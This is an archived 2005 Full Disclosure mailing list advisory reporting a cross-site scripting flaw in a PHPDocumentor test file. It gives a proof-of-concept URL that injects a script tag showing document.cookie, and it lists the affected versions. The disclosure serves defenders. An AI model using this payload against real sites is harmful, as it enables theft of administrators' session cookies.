Full Disclosure mailing list archives
PHPDocumentor Cross-Site Scripting
From: zeus olimpusklan <zeus.olimpusklan () gmail com>
Date: Fri, 30 Dec 2005 22:06:49 -0600
########################################################################### # Advisory #3 Title: PHPDocumentor Cross-Site Scripting # # # Author: 0o_zeus_o0 # Contact: zeus () diosdelared com # Website: olimpusklan.org # Date: 30/12/2005 # Risk: High # Vendor Url: http://www.phpdoc.org/ # Affected Software: PHPDocumentor # Non Affected: # # We Are:olimpus klan team # #TECHNICAL INFO #================================================================ #bug allows cookie robbery to the administrator # # # #Example: # #http://example.com/[path]/Documentation/tests/bug-559668.php ?FORUM[LIB]=[XSS] # #http://example.com/[path]/Documentation/tests/bug-559668.php ?FORUM[LIB]=<script>alert(document.cookie)</script> # # # # # #VULNERABLE VERSIONS #================================================================ # T0das #1.3 RC4 #1.3 RC3 #1.2.3 #1.2.2 #1.2.1 #1.2 # #================================================================ #Contact information #0o_zeus_o0 #zeus () diosdelared com #www.EliteMexico.Org #================================================================ #greetz: lady fire, fraude, adi, xoxo ,El_mesias, pandora, mbyte,Rigter ##############################################################################
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- PHPDocumentor Cross-Site Scripting zeus olimpusklan (Dec 30)